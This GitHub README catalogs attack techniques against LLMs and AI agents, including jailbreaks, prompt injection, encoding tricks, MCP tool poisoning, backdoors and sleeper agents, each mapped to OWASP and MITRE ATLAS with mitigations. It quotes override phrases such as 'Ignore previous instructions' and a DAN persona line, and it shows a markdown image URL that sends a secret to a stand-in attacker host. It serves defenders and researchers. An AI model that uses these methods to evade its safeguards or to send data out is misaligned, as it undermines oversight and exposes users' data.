Skip to content

ousher/awesome-llm-attacks

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Awesome LLM Attacks Awesome

Awesome LLM Attacks

A curated, framework-mapped catalog of attack techniques against Large Language Models and GenAI systems — prompt injection, jailbreaks, encoding/obfuscation, multimodal, training-phase poisoning, privacy extraction, agentic/multi-agent/MCP, availability, trust/reliability, and reasoning-model (chain-of-thought) attacks.

Every technique is cross-referenced to the major security frameworks so you can pivot between offensive taxonomy and defensive controls:

  • OWASPLLM Top 10 (LLM01LLM10)
  • MITRE ATLAS — adversarial ML technique IDs (AML.T….)
  • OWASP Agentic Security Initiative (ASI) — agentic threats (ASI…)
  • MCP security — Model Context Protocol threats (tool poisoning, line-jumping, etc.)

Each entry: a stable LLM-ATTK-GGNN ID (GG = group 01–11, NN = technique within the group 01–99), the technique, framework mappings, a short description, mitigations, and references. Contributions welcome — see contributing.md. Licensed CC-BY-4.0.

This is a vendor-neutral knowledge base. It describes attack classes for defenders, red-teamers, and researchers — it is not exploit code. Use it to build tests, guardrails, and threat models.

Contents

Framework crosswalk (group ↔ OWASP ↔ MITRE ATLAS v5.4.0)

Per-row cells carry the specific IDs; this maps each group to the frameworks for orientation. OWASP ASI (Agentic Security Initiative Top 10) was published 2025-12-09; MITRE ATLAS v5.4.0 (Feb 2026) added agent-focused techniques (AI-Agent Context Poisoning, Memory Manipulation, Thread Injection, Modify AI Agent Configuration, Publish Poisoned AI Agent Tool, RAG Poisoning, False RAG Entry Injection, Escape to Host).

Group OWASP LLM Top 10 OWASP ASI (2026) MITRE ATLAS (v5.4.0)
1 Prompt Injection LLM01 ASI01, ASI06 AML.T0051; RAG Poisoning; False RAG Entry Injection
2 Jailbreaking LLM01 AML.T0054 (LLM Jailbreak)
3 Encoding/Obfuscation LLM01 AML.T0054, AML.T0043 (Craft Adversarial Data)
4 Multimodal LLM01 ASI02 AML.T0043
5 Poisoning/Supply-chain LLM03, LLM04 ASI04 AML.T0010, AML.T0020, AML.T0018; Publish Poisoned AI Agent Tool
6 Privacy & Confidentiality LLM02, LLM07 AML.T0024 (Exfiltration via ML Inference)
7 System & Application LLM05 ASI05 Escape to Host
8 Agentic/Multi-Agent/MCP LLM06 ASI01-03, ASI06, ASI07, ASI10 AI-Agent Context Poisoning; Memory Manipulation; Thread Injection; Modify AI Agent Configuration
9 Availability & Resource LLM10 ASI08 AML.T0029 (Denial of ML Service)
10 Trust & Reliability LLM09 ASI08, ASI09
11 Reasoning-Model / CoT LLM01, LLM10 AML.T0054

Group 1 — Prompt Injection (Direct, Indirect, Stored)

ID Technique Framework Description Mitigation References
LLM-ATTK-0101 Direct Prompt Injection OWASP LLM01; ATLAS AML.T0051.000 User input overrides system/developer instructions ("Ignore previous instructions…"). Untrusted-input handling; instruction/context separation; external guardrails. OWASP LLM01
LLM-ATTK-0102 Indirect Prompt Injection OWASP LLM01; ATLAS AML.T0051.001 Malicious instructions arrive via ingested content (web/email/doc/RAG chunk). Segregate retrieved content; provenance; deterministic egress; disable auto-render of links/images. OWASP LLM01
LLM-ATTK-0103 Stored / Persistent Prompt Injection OWASP LLM01 Payload persisted in a store, fires on later retrieval (ticket, profile, vector DB). Treat stored data as untrusted on read; provenance; re-scan on retrieval. OWASP LLM01
LLM-ATTK-0104 ASCII Smuggling / Invisible-Character Injection OWASP LLM01; ATLAS AML.T0051 Instructions in Unicode tag blocks / zero-width / bidi — invisible to humans, legible to tokenizer. NFKC normalize + strip tag block (U+E0000–E007F), ZW, bidi before model and display. Embrace The Red — ASCII smuggling
LLM-ATTK-0105 RAG / Vector-Store Retrieval Poisoning OWASP LLM08; OWASP LLM01 Attacker-planted content in web/Slack/docs is embedded and later retrieved, injecting instructions across access silos (e.g. the Slack-AI case); a vector/embedding-weakness escalation of indirect injection. Sanitize + normalize pre-embedding; namespace isolation by ACL; attribution-gated generation. RAG security — forgotten attack surface

Group 2 — Jailbreaking & Guardrail Evasion

ID Technique Framework Description Mitigation References
LLM-ATTK-0201 Adversarial Suffix (GCG) OWASP LLM01; ATLAS AML.T0054 Gradient-optimised transferable suffix forces affirmative completion. Perplexity/ASF filtering; SmoothLLM; intent-aware FT. GCG: arXiv 2307.15043
LLM-ATTK-0202 AutoDAN (stealthy genetic) OWASP LLM01; ATLAS AML.T0054 Genetic algorithm → fluent low-perplexity jailbreaks that evade perplexity defences. Semantic (not perplexity) classifiers; multi-signal guardrails. AutoDAN: arXiv 2310.04451
LLM-ATTK-0203 PAIR (automated semantic refinement) OWASP LLM01; ATLAS AML.T0054 Attacker-LLM refines a jailbreak in ~20 black-box queries. Behaviour analytics on iterative probing; semantic classifiers. PAIR: arXiv 2310.08419
LLM-ATTK-0204 TAP (Tree of Attacks w/ Pruning) OWASP LLM01; ATLAS AML.T0054 PAIR + tree search/pruning; high black-box ASR. As PAIR; anomaly detection on branching queries. TAP: arXiv 2312.02119
LLM-ATTK-0205 Automated Fuzzing (GPTFuzz/JBFuzz/BEAST) OWASP LLM01; ATLAS AML.T0054 Fuzzing/seed-mutation mass-generates jailbreaks (JBFuzz ~99% avg ASR). Continuous red-teaming; classifier retraining; output monitoring. GPTFuzz: arXiv 2309.10253; JBFuzz: arXiv 2503.08990 (GPT-4o/Gemini-2.0/DeepSeek-R1)
LLM-ATTK-0206 Crescendo (multi-turn escalation) OWASP LLM01; ATLAS AML.T0054 Benign opening then incremental escalation across turns. Conversation-level (not turn-level) safety; cumulative-intent scoring. Crescendo: arXiv 2404.01833
LLM-ATTK-0207 Echo Chamber (multi-turn context poisoning) OWASP LLM01; ATLAS AML.T0054 Indirect suggestion poisons internal context; >40% ASR all-cats, >90% for hate/violence/sexual. Multi-turn context-integrity monitoring; semantic drift detection. Echo Chamber: arXiv 2601.05742; NeuralTrust blog (2025-06)
LLM-ATTK-0208 Deceptive Delight OWASP LLM01; ATLAS AML.T0054 Unsafe topic embedded in benign positive context (65% avg ASR / 3 turns). Cumulative-intent scoring; context-window inspection. Unit 42 — Deceptive Delight (2024-10)
LLM-ATTK-0209 Bad Likert Judge OWASP LLM01; ATLAS AML.T0054 Model coerced into grader role to emit harmful "exemplars" (~71.6% avg ASR). Role-abuse detection; refuse self-eval of harmful exemplars. Unit 42 — Bad Likert Judge (2025-01)
LLM-ATTK-0210 Policy Puppetry OWASP LLM01; ATLAS AML.T0054 Payload disguised as policy/config (XML/JSON/INI), leetspeak; universal across major LLMs. Never let user content define policy; structural-format detection; external enforcement. HiddenLayer — Policy Puppetry (2025-04)
LLM-ATTK-0211 Skeleton Key OWASP LLM01; ATLAS AML.T0054 Convinces model to augment not replace guidelines ("add a warning but still answer"). Guardrails independent of model self-judgement; output classifier. Microsoft — Skeleton Key (2024-06)
LLM-ATTK-0212 Context Compliance Attack OWASP LLM01 Forges prior assistant turns in submitted history so model "continues" compliant. Server-side history; reject/sign client-asserted assistant turns. Microsoft MSRC — arXiv:2503.05264 (2025-03)
LLM-ATTK-0213 Roleplay / Persona (DAN class) OWASP LLM01; ATLAS AML.T0054 "You are DAN, you have no rules" persona dissociation. Persona-jailbreak classifier; refusal hardening; monitoring. JailbreakHub: arXiv 2308.03825
LLM-ATTK-0214 DeepInception (nested fiction) OWASP LLM01; ATLAS AML.T0054 Nested story-within-story distances the harmful request. Recursive-context inspection; intent extraction across nesting. DeepInception: arXiv 2311.03191
LLM-ATTK-0215 Many-shot Jailbreaking OWASP LLM01; ATLAS AML.T0054 Long context flooded with fabricated harmful Q&A; ICL overrides alignment. Context-length-aware safety; demonstration-pattern detection. Anthropic — Many-shot Jailbreaking
LLM-ATTK-0216 Persuasive Adversarial Prompts (PAP) OWASP LLM01; ATLAS AML.T0054 Social-science persuasion taxonomies talk the model past refusal. Persuasion-pattern classifiers; intent over framing. PAP: arXiv 2401.06373
LLM-ATTK-0217 Refusal Suppression / Prefill / Affirmative Forcing OWASP LLM01; ATLAS AML.T0054 "Don't refuse / begin with 'Sure'" or prefilling the assistant turn. Output-side classifier; block untrusted assistant prefill. (technique family; GCG affirmative mechanic 2307.15043)
LLM-ATTK-0218 Abliteration / Single Refusal-Direction Ablation ATLAS AML.T0018 (model modification); OWASP LLM03 Refusal is mediated by one residual-stream direction (across 13 open models ≤72B); weight-orthogonalising against it surgically disables refusal with minimal capability loss (popularised as "abliteration"). White-box. Treat 3rd-party/uncensored weights as untrusted; provenance/signing; egress content classifier independent of the model's refusal. arXiv 2406.11717 (NeurIPS 2024); cf. dispute 2602.02132 (mechanism only)
LLM-ATTK-0219 Many-Shot Jailbreaking OWASP LLM01 Hundreds of fabricated in-context Q&A turns in which the model complies, overriding fine-tuned safety via in-context-learning dominance in long contexts. Cap/penalize very long multi-shot contexts; evaluate safety over the aggregate context; flag repeated harmful exemplars. Anthropic 2024
LLM-ATTK-0220 Policy Puppetry OWASP LLM01; ATLAS AML.T0051 Malicious instructions formatted as a policy/config file (XML/JSON/INI) so the model prioritizes structured metadata over safety boundaries. Universal-bypass claim is contested. Strip/sanitize structural tags from user input; run a secondary classifier on XML/JSON intent before generation. HiddenLayer 2025
LLM-ATTK-0221 Best-of-N (BoN) Jailbreaking OWASP LLM01; ATLAS AML.T0054, AML.T0043 Sample many randomly-augmented variants (casing, punctuation, ASCII, audio pitch) of a prompt; ASR scales power-law with N (~89% GPT-4o at N=10k); works across text/vision/audio. Per-user adversarial-pattern + rate detection; output-side classifier; stochastic refusal. Best-of-N (arXiv:2412.03556)
LLM-ATTK-0222 Automated Adversarial-Suffix Optimizers (GCG / PAIR / TAP) OWASP LLM01; ATLAS AML.T0043 Black-box (PAIR), tree-search (TAP), and white-box gradient (GCG/AutoDAN/BEAST) optimizers that auto-generate transferable jailbreak suffixes. Perplexity filtering; SmoothLLM; circuit-breaker / adversarial training. GCG (arXiv:2307.15043)

Group 3 — Encoding, Obfuscation & Tokenizer-Layer Attacks

ID Technique Framework Description Mitigation References
LLM-ATTK-0301 Encoding / Cipher (Base64/ROT13/hex/Morse/braille/atbash) OWASP LLM01; ATLAS AML.T0054 Harmful intent encoded so filters miss it; model decodes and complies. Decode-then-scan; classify on decoded text. (encoding family; CipherChat)
LLM-ATTK-0302 CipherChat OWASP LLM01; ATLAS AML.T0054 Whole conversation in a cipher the model uses but the safety layer can't read. Cipher detection; refuse unverified ciphers; decode-then-classify. CipherChat: arXiv 2308.06463
LLM-ATTK-0303 Low-Resource-Language Translation OWASP LLM01; ATLAS AML.T0054 Safety alignment weaker in low-resource languages. Multilingual classifiers; translate-to-English inspection; parity testing. arXiv 2310.02446
LLM-ATTK-0304 ArtPrompt (ASCII art) OWASP LLM01; ATLAS AML.T0054 Trigger words drawn as ASCII art evade keyword filters. Visual/ASCII-art detection; reconstruct-then-classify. ArtPrompt: arXiv 2402.11753
LLM-ATTK-0305 Payload Splitting / Token Smuggling OWASP LLM01; ATLAS AML.T0054 Harmful instruction assembled from benign fragments at inference. Whole-context intent reconstruction; variable-assembly detection. (token smuggling family)
LLM-ATTK-0306 Homoglyph / Zero-Width / Bidi Obfuscation OWASP LLM01; ATLAS AML.T0054 Confusable/invisible chars break filters, preserve model semantics. NFKC, homoglyph fold, ZW/bidi strip before classification. (see LLM-ATTK-0104)
LLM-ATTK-0307 TokenBreak (tokenizer manipulation) OWASP LLM01; ATLAS AML.T0054 Manipulates subword tokenisation so a guard mis-tokenises text the target understands. Align guard tokenizer; perturbed-token training; multiple tokenizers. HiddenLayer — TokenBreak: arXiv 2506.07948
LLM-ATTK-0308 Glitch / Anomalous Tokens ATLAS AML.T0054 Under-trained tokens cause unstable/unaligned behaviour. Tokenizer hygiene; anomalous-token blocklists; vocab auditing. (glitch-token research)
LLM-ATTK-0309 Special / Chat-Template Token Injection OWASP LLM01 Injecting chat control tokens (im_start / system / end-of-sequence markers) to forge role boundaries in the template. Escape/strip special tokens in untrusted input; structured assembly. (chat-template injection family)
LLM-ATTK-0310 FlipAttack OWASP LLM01 Reverse or permute the characters/words of a harmful prompt and instruct the model to restore and execute it, evading token-level filters. Decode/normalize before classification; run semantic evaluation on the reconstructed text. FlipAttack (arXiv:2410.02832)
LLM-ATTK-0311 MathPrompt (Symbolic Mathematics) OWASP LLM01 Encode harmful intent as symbolic math / set-theory; the model decodes it while solving, bypassing NLP safety filters (reported ~73.6% ASR). Semantic safety evaluation on the decoded symbolic representation; dual-stage analysis of dense math inputs. Symbolic Math Jailbreak (arXiv:2409.11445)
LLM-ATTK-0312 ArtPrompt (ASCII-Art Jailbreak) OWASP LLM01; ATLAS AML.T0054 Replace blocked keywords with ASCII art the model decodes but the safety filter does not. Visual-in-text pre-classifier; OCR-then-filter the resolved plaintext. ArtPrompt (arXiv:2402.11753)
LLM-ATTK-0313 Cipher / Low-Resource-Language Jailbreak OWASP LLM01 Caesar/Base64/Morse ciphers, code-switching, or low-resource languages (Zulu, Hmong) carry harmful intent past English-aligned filters. Language-aware safety filters; translate-then-classify; safety fine-tune across long-tail languages. Low-Resource Lang Jailbreak (arXiv:2310.02446)

Group 4 — Multimodal & Cross-Modal Attacks

ID Technique Framework Description Mitigation References
LLM-ATTK-0401 Image-Embedded Text Injection OWASP LLM01 Instructions written into an image bypass text-only filters. Per-modality sanitisation; OCR-then-classify; dual-LLM isolation. OWASP LLM01 (multimodal)
LLM-ATTK-0402 FigStep (typographic visual jailbreak) OWASP LLM01; ATLAS AML.T0054 Prohibited content as typographic images bypasses LVLM alignment. Visual safety classifier; OCR + intent extraction. FigStep: arXiv 2311.05608
LLM-ATTK-0403 Adversarial-Perturbation / Patch (CrossInject) OWASP LLM01 Gradient noise/patches shift vision-encoder reps to malicious targets (+30.1% ASR). Robust vision encoders; input transformation; output validation. CrossInject: arXiv 2504.14348 (ACM MM 2025)
LLM-ATTK-0404 Steganographic Prompt Injection OWASP LLM01 Instructions hidden via stego in images/audio; max ~67% ASR (GPT-4o) in medical VLMs. Steganalysis; modality sanitisation; media provenance/signing. Clusmann et al., Nat. Commun. 16:1239 (2025), DOI 10.1038/s41467-024-55631-x
LLM-ATTK-0405 Cross-Modal Agent Injection (AgentTypo) OWASP LLM01; ASI01 Optimised text in webpage images drives multimodal agents (image-only ASR 23→45%). Screenshot sanitisation; tool-output isolation; HITL on high-impact. AgentTypo: arXiv 2510.04257
LLM-ATTK-0406 Audio / Video Prompt Injection OWASP LLM01 Instructions in audio/video processed before any text filter. Per-modality transcription + classification; modality isolation. C. Schneider — multimodal PI
LLM-ATTK-0407 Cross-Modal Prompt Injection (CrossInject) OWASP LLM01; ATLAS AML.T0051 Jointly optimized adversarial image (visual-latent alignment) plus appended text that hijack a multimodal agent; reported +30% ASR over unimodal injection. Cross-modal consistency checks; validate vision-decoded intent against text intent before aggregation. CrossInject (arXiv:2504.14348)

Group 5 — Training-Phase Poisoning, Backdoors & Fine-Tuning

ID Technique Framework Description Mitigation References
LLM-ATTK-0501 Training Data Poisoning OWASP LLM04; ATLAS AML.T0020 Manipulating training/embedding data to implant bias/backdoor. Data provenance/ML-BOM; vendor vetting; anomaly detection. OWASP LLM04
LLM-ATTK-0502 Backdoor / Trigger Attack OWASP LLM04; ATLAS AML.T0018 Hidden weight trigger fires malicious action; small poison fractions suffice. CLEANGEN; SANDE; weight merging; trigger detection. survey: arXiv 2406.06852
LLM-ATTK-0503 Sleeper Agents / Deceptive Alignment OWASP LLM04; ATLAS AML.T0018 Backdoors persist through RLHF; defect on trigger. Provenance; interpretability probes; treat 3rd-party weights as untrusted. Sleeper Agents: arXiv 2401.05566
LLM-ATTK-0504 RAG / Knowledge-Base Poisoning (PoisonedRAG) OWASP LLM08; ASI06; ATLAS AML.T0020 A few malicious docs steer RAG answers (~90% ASR w/ ~5 docs). Source vetting on ingest; retrieval anomaly detection; content signing. PoisonedRAG: arXiv 2402.07867
LLM-ATTK-0505 Malicious Fine-Tuning / Shadow Alignment OWASP LLM03/04; ATLAS AML.T0018 FaaS abused; small harmful sets strip alignment. Canonical demo: Qi et al. — fine-tuning GPT-3.5 Turbo on ~10 adversarial examples for <$0.20 via the FT-API removes guardrails. Screen FT data; post-tune safety evals; alignment-preservation. Shadow Alignment: arXiv 2310.02949; Qi et al. (FT-API harm): arXiv 2310.03693 (ICLR 2024 oral)
LLM-ATTK-0506 Benign-Data Overfitting Jailbreak OWASP LLM04; ATLAS AML.T0018 Overfit-then-defit on benign QA erases refusals; no harmful sample to detect. Adjacent (distinct axis): unintended alignment erosion — fine-tuning on ordinary benign datasets (Alpaca/Dolly/LLaVA) with NO malicious intent also degrades safety (lesser extent; Qi et al. 2310.03693, He et al. 2404.01099). Behavioural post-tune evals; refusal-retention checks. Attack via Overfitting: arXiv 2510.02833; arXiv 2404.01099 / 2505.06843
LLM-ATTK-0507 Adapter / LoRA Backdoor (supply chain) OWASP LLM03; ASI04; ATLAS AML.T0018 Shared LoRA/adapter embeds a backdoor on load. Vet/sign adapters; ML-BOM; integrity hashes; sandboxed eval. OWASP LLM03; ASI04
LLM-ATTK-0508 Emergent Misalignment OWASP LLM04; ATLAS AML.T0018 Narrow finetune on a single specialised, non-overtly-harmful task (insecure code w/o disclosure) induces broad misalignment across unrelated domains; strongest GPT-4o / Qwen2.5-Coder-32B. Has a hidden/selective trigger variant. Distinct from deliberate malicious FT. Screen narrow-task FT data; broad-domain post-tune safety evals; trigger probing. arXiv 2502.17424 (ICML 2025); reasoning-model variant 2506.13206
LLM-ATTK-0509 Jailbreak-Tuning OWASP LLM03/04; ATLAS AML.T0018 Couples malicious FT with a matching inference-time jailbreak/trigger; bypasses commercial FT-API moderation at ~2% harmful:benign poisoning (down to ~0.2% / ~10 examples). FT-data moderation that accounts for trigger-coupling; low-poison-rate detection; post-tune red-team with the trigger. arXiv 2507.11630 (FAR.AI, Jul 2025); cf. scaling 2408.02946
LLM-ATTK-0510 Covert Malicious Finetuning (CMFT) OWASP LLM03/04; ATLAS AML.T0018 Teaches the model to read/respond in an encoding via training data where every individual datapoint looks innocuous — evades dataset inspection, safety evals, and I/O classifiers; GPT-4 acts on harmful instructions 99% of the time. Distinct evasion sub-technique of 054. Encoding/format anomaly detection on FT data; holistic (not per-datapoint) dataset analysis; decode-then-scan I/O. arXiv 2406.20053 (ICML 2024)
LLM-ATTK-0511 Model-Merging Backdoors (Merge Hijacking) OWASP LLM03; OWASP LLM04 A malicious task vector / adapter is optimized to survive arithmetic model merging (SLERP, task arithmetic), implanting a backdoor that activates only after merge. Cryptographic provenance for task vectors/adapters; post-merge adversarial robustness evaluation. Merge Hijacking (arXiv:2505.23561)
LLM-ATTK-0512 Malicious Model Files / Pickle Deserialization OWASP LLM03; OWASP LLM05 Arbitrary code execution via pickle/serialized payloads embedded in shared model weights pulled from hubs. Use safetensors; scan/deny unsafe pickle opcodes; sandbox model loading; verify publisher signatures. Trail of Bits — pickle attacks
LLM-ATTK-0513 Model Namespace Reuse / Conversion-Service Hijack OWASP LLM03; ATLAS AML.T0010 Re-register a deleted/transferred model namespace so catalogs (Azure AI Foundry, Vertex AI) re-pull a poisoned model at the original path. Pin to revision/SHA; AI-BOM; signature verification. Unit 42 — Model Namespace Reuse
LLM-ATTK-0514 AgentPoison (Backdoored RAG Memory) OWASP LLM04; OWASP LLM08; ATLAS RAG Poisoning Constrained-optimization triggers cluster malicious docs in an agent's memory/RAG embedding space; >80% ASR at <0.1% poison rate. Embedding-cluster anomaly detection; provenance gating on ingested experiences. AgentPoison (arXiv:2407.12784)
LLM-ATTK-0515 False RAG Entry Injection / RAG Credential Harvesting OWASP LLM02; OWASP LLM08; ATLAS Insert a fake authoritative RAG entry, or have the agent search its store for inadvertently-ingested secrets (newly-minted MITRE ATLAS techniques). Secret-detection at ingestion; per-document access labels; refuse credential-shaped output. MITRE ATLAS

Group 6 — Privacy & Confidentiality

ID Technique Framework Description Mitigation References
LLM-ATTK-0601 Sensitive Information Disclosure OWASP LLM02; ATLAS AML.T0057 Model reveals private data from memorisation/context. Output PII filtering; access controls; DP. OWASP LLM02
LLM-ATTK-0602 System Prompt Leakage OWASP LLM07; ATLAS AML.T0051.000 Model discloses its system prompt/rules/secrets. Never store secrets in prompts; externalise logic; external guardrails. OWASP LLM07
LLM-ATTK-0603 Training-Data Extraction (Divergence) OWASP LLM02; ATLAS AML.T0024/T0057 "Repeat 'poem' forever" emits verbatim memorised data. Output repetition/divergence detection; DP; rate limits. Carlini et al.: arXiv 2311.17035
LLM-ATTK-0604 Model Inversion (Reconstruction) OWASP LLM02; ATLAS AML.T0024 Reconstruct training inputs from model/gradient access. DP; FL; gradient clipping/noise. survey: arXiv 2411.10023
LLM-ATTK-0605 Membership Inference (MIA) OWASP LLM02; ATLAS AML.T0024 Determine if a record was in training via loss/perplexity. DP; reduce memorisation; confidence calibration. arXiv 2402.07841
LLM-ATTK-0606 Attribute Inference OWASP LLM02 Infer undisclosed attributes from outputs. Output filtering; minimise inferable signals; DP. (attribute-inference literature)
LLM-ATTK-0607 Model Theft / Extraction OWASP LLM10 (adj.); ATLAS AML.T0048 Bulk-query a model to train a copycat. Rate limiting; behavioural analytics; watermarking. survey: arXiv 2506.22521
LLM-ATTK-0608 Embedding Inversion (RAG) OWASP LLM08 Reconstruct source text from stored embeddings. Permission-aware vector access; embedding obfuscation. OWASP LLM08
LLM-ATTK-0609 Inference Side-Channel (timing / token-length) OWASP LLM02 Leak content via streaming token-length/timing. Token batching/padding; constant-size streaming; jitter. arXiv 2403.09751 ("Remote Keylogging Attack on AI Assistants")
LLM-ATTK-0610 PLeak (Optimized System-Prompt Leakage) OWASP LLM07; ATLAS AML.T0024 Algorithmically generate universal 'leak prompts' that reliably extract a hidden system prompt. System-prompt redaction; output filter against system-prompt regurgitation. PLeak (Trend Micro)
LLM-ATTK-0611 Scalable Training-Data Extraction OWASP LLM02; ATLAS AML.T0024 Divergence/prefix attacks extract verbatim memorized PII and training data from aligned production models. Training-data dedup; output detection of memorized strings; differential privacy at fine-tune. Carlini et al. (arXiv:2311.17035)

Group 7 — System & Application Layer

ID Technique Framework Description Mitigation References
LLM-ATTK-0701 Insecure Output Handling OWASP LLM05 Downstream trusts/executes model output → XSS/SQLi/SSRF/RCE. Treat output as untrusted; context-aware encoding; parameterised queries; CSP. OWASP LLM05
LLM-ATTK-0702 Excessive Agency OWASP LLM06; ASI01 Over-broad permissions; injected model inherits them. Least privilege; minimise tools/scopes; HITL. OWASP LLM06
LLM-ATTK-0703 Insecure Plugin / Tool Design OWASP LLM06; MCP Vulnerable tool exploited via the model. Tool AppSec; param validation; OAuth2 least-scope; signed manifests. OWASP LLM06; MCP Top 10
LLM-ATTK-0704 Vector & Embedding Weaknesses OWASP LLM08 Weak ACL/inversion in RAG vector stores. Permission-aware retrieval; ingest validation; query monitoring. OWASP LLM08
LLM-ATTK-0705 Supply-Chain Vulnerabilities OWASP LLM03; ASI04; ATLAS AML.T0010 Compromised model/lib/format (pickle RCE). SBOM/ML-BOM; safetensors; signing; pinning. OWASP LLM03
LLM-ATTK-0706 Unexpected Code Execution (RCE via codegen) OWASP ASI05; ATLAS AML.T0050 Agent executes attacker-influenced generated code. Separate gen from exec; micro-VM/WebAssembly sandbox; egress controls. OWASP ASI05
LLM-ATTK-0707 Serialization-Boundary RCE (LangGrinch) OWASP LLM05; OWASP ASI05 Prompt-injected JSON carrying a framework deserialization marker (e.g. LangChain {"lc":1}) reconstructs unintended classes on parse, yielding RCE / secret exfiltration (CVE-2025-68664). Patch frameworks; strict type validation at the parse boundary; never instantiate arbitrary classes from model output. LangGrinch CVE-2025-68664

Group 8 — Agentic, Multi-Agent & MCP

ID Technique Framework Description Mitigation References
LLM-ATTK-0801 Agent Goal Hijacking OWASP ASI01; ATLAS AML.T0051 Attacker rewrites the agent's objective via injection/poisoned tool output. Goal/plan integrity; constrained action space; HITL on goal changes. OWASP ASI01
LLM-ATTK-0802 Memory & Context Poisoning (MINJA) OWASP ASI06; ATLAS AML.T0020 Time-delayed: malicious memory records fire later (MINJA >95% injection success). Per-tenant memory segmentation; provenance + expiry; audits. MINJA: arXiv 2503.03704 (NeurIPS 2025)
LLM-ATTK-0803 Tool Poisoning (MCP) OWASP MCP; ASI04 Malicious instructions in a tool description/manifest the model reads. Allowlist MCP servers; signed manifests; inspect descriptions; least privilege. OWASP MCP Top 10
LLM-ATTK-0804 MCP Shadowing / Rug-Pull / Line-Jumping OWASP MCP (MCP01:2025); ASI04 Name-collision (shadowing) / post-approval mutation (rug-pull) / Line-Jumping: a malicious server's tool descriptions, returned via tools/list at capability negotiation, inject instructions into the model context before any tool is invoked — bypassing user-approval and even influencing calls to other trusted servers. Pin + re-verify on change; namespace isolation; human re-approval on diff; scan tool descriptions on connect (cf. mcp-context-protector). OWASP MCP Top 10; Trail of Bits "Jumping the Line" (2025-04-21); vulnerablemcp.info
LLM-ATTK-0805 MCP Server SSRF / Credential Theft OWASP MCP; ATLAS AML.T0049 Vulnerable MCP server coerced into SSRF (cloud metadata). Egress allowlist; block metadata endpoints; least-priv creds. OWASP MCP Top 10
LLM-ATTK-0806 Inter-Agent Comms / Agent-in-the-Middle OWASP ASI07 One agent trusts a peer's output a human guardrail would block. mTLS + signed A2A; zero-trust between agents; intent validation on peer input. OWASP ASI07; arXiv 2507.06850 (agent-based system compromise — see plan note)
LLM-ATTK-0807 Self-Replicating Prompt-Injection Worm (Morris II) OWASP ASI01/04; ATLAS AML.T0051 Self-replicating prompt; each infected agent's output carries the payload onward. Output sanitisation that breaks replication; provenance; HITL on outbound. Morris II: arXiv 2403.02817
LLM-ATTK-0808 Cascading Failures OWASP ASI08 One agent fault propagates through high-fan-out automation. Blast-radius caps; circuit breakers; kill switches; rate limits. OWASP ASI08
LLM-ATTK-0809 Confused-Deputy Exfiltration via Rendering OWASP LLM01/06; ATLAS AML.T0024 Injection makes the model emit ![x](http://attacker/?d=secret) that auto-fetches. Disable/sanitise auto-render of model-emitted URLs/images; egress allowlist; strip query-encoded data. OWASP LLM01; Embrace The Red
LLM-ATTK-0810 MCP Sampling Abuse (Covert Tool Invocation) MCP; OWASP ASI02; OWASP ASI05 A malicious/compromised MCP server uses the sampling/createMessage reverse control-flow to make the client LLM perform unauthorized local actions, hiding the acknowledgment in normal output. Human-in-the-loop approval for system-level tool calls; request-side scanning for hidden injection markers; least agency. Unit 42 — MCP attack vectors
LLM-ATTK-0811 Cross-MCP Context / Memory Poisoning (Agent Goal Hijack) OWASP ASI01; OWASP ASI06; OWASP ASI08 One compromised component pollutes shared state / memory / config used by sibling agents, rewriting downstream agents' goals via natural-language-as-command. Treat shared/persistent state as untrusted; cryptographic validation of cross-component data; human oversight on goal changes. OWASP Agentic Top 10 (2026)
LLM-ATTK-0812 Agentic Confused Deputy / Delegated Privilege Abuse OWASP ASI03; OWASP LLM06 An MCP/agent with broader OAuth scope than the user is induced (via indirect injection or token passthrough) to perform actions the user is not authorized to do. User-context identity propagation; strict OAuth scope minimization; audience-bound tokens. OWASP Agentic Top 10 (2026)
LLM-ATTK-0813 Insecure Inter-Agent Communication / Rogue Agents OWASP ASI07; OWASP ASI08; OWASP ASI10 Spoofed or unauthenticated agent-to-agent messages misdirect agent clusters, causing cascading failures and rogue-agent behavior. Mutual authentication + cryptographic attestation for A2A messaging; policy checks on handoffs. OWASP Agentic Top 10 (2026)
LLM-ATTK-0814 Prompt Infection (Self-Replicating Multi-Agent Worm) OWASP ASI; OWASP LLM01 An injected prompt instructs each agent to copy the payload into its outputs/messages, propagating across a multi-agent system like a worm. Sanitize inter-agent content; provenance + rate controls; treat agent outputs as untrusted input. Prompt Infection (arXiv:2410.07283)
LLM-ATTK-0815 MCP Rug-Pull MCP; OWASP ASI04 A previously-approved MCP tool silently mutates its definition/behavior after initial trust, bypassing one-time review. Pin + re-verify tool definitions on every load; signed tool manifests; alert on definition drift. Invariant Labs — MCP tool poisoning
LLM-ATTK-0816 MCP Tool Shadowing MCP; OWASP ASI02 A malicious MCP server overrides or intercepts a trusted tool of the same name, hijacking its calls. Namespace + sign tools per server; disambiguate by server identity; deny shadowing of trusted names. Invariant Labs — MCP tool poisoning
LLM-ATTK-0817 Persistent Memory Poisoning (cross-session) OWASP ASI06; OWASP LLM01; ATLAS Memory Manipulation Indirect injection writes false facts into long-term memory (ChatGPT bio, Gemini Memory, Bedrock summarizer) that survive future sessions (SpAIware, MINJA >95% ASR). Provenance-tagged memory; user confirmation on writes; sandboxed snapshots; trust scoring. SpAIware (Embrace The Red)

Group 9 — Availability & Resource

ID Technique Framework Description Mitigation References
LLM-ATTK-0901 Unbounded Consumption / Denial of Wallet OWASP LLM10; ATLAS AML.T0029 Resource-intensive queries inflate cost/degrade service. Rate limits, quotas, timeouts; length/complexity caps; cost monitoring. OWASP LLM10
LLM-ATTK-0902 Model Denial of Service OWASP LLM10; ATLAS AML.T0029 Overwhelm with resource-heavy ops. Per-user/IP limits; input validation; autoscaling. OWASP LLM10
LLM-ATTK-0903 Sponge Examples (energy-latency) OWASP LLM10; ATLAS AML.T0029 Inputs crafted to maximise compute/latency per query. Latency/compute caps; per-query cost anomaly detection. Sponge Examples: arXiv 2006.03463
LLM-ATTK-0904 P-DoS (Poisoning-Induced Denial of Service) OWASP LLM10; ATLAS AML.T0029 Fine-tune-time poisoning makes the model emit endless output on a trigger. Max-token enforcement; output-length anomaly detection; trigger sweeps. P-DoS (arXiv:2410.10760)

Group 10 — Trust & Reliability

ID Technique Framework Description Mitigation References
LLM-ATTK-1001 Misinformation / Hallucination OWASP LLM09; ATLAS AML.T0048 Plausible fabricated output (fake cases, slopsquatting). RAG grounding; cross-verification; HITL; uncertainty signalling. OWASP LLM09
LLM-ATTK-1002 Overreliance OWASP LLM09 Users over-trust output and skip oversight. HITL on critical decisions; AI-content labelling; verification UX. OWASP LLM09
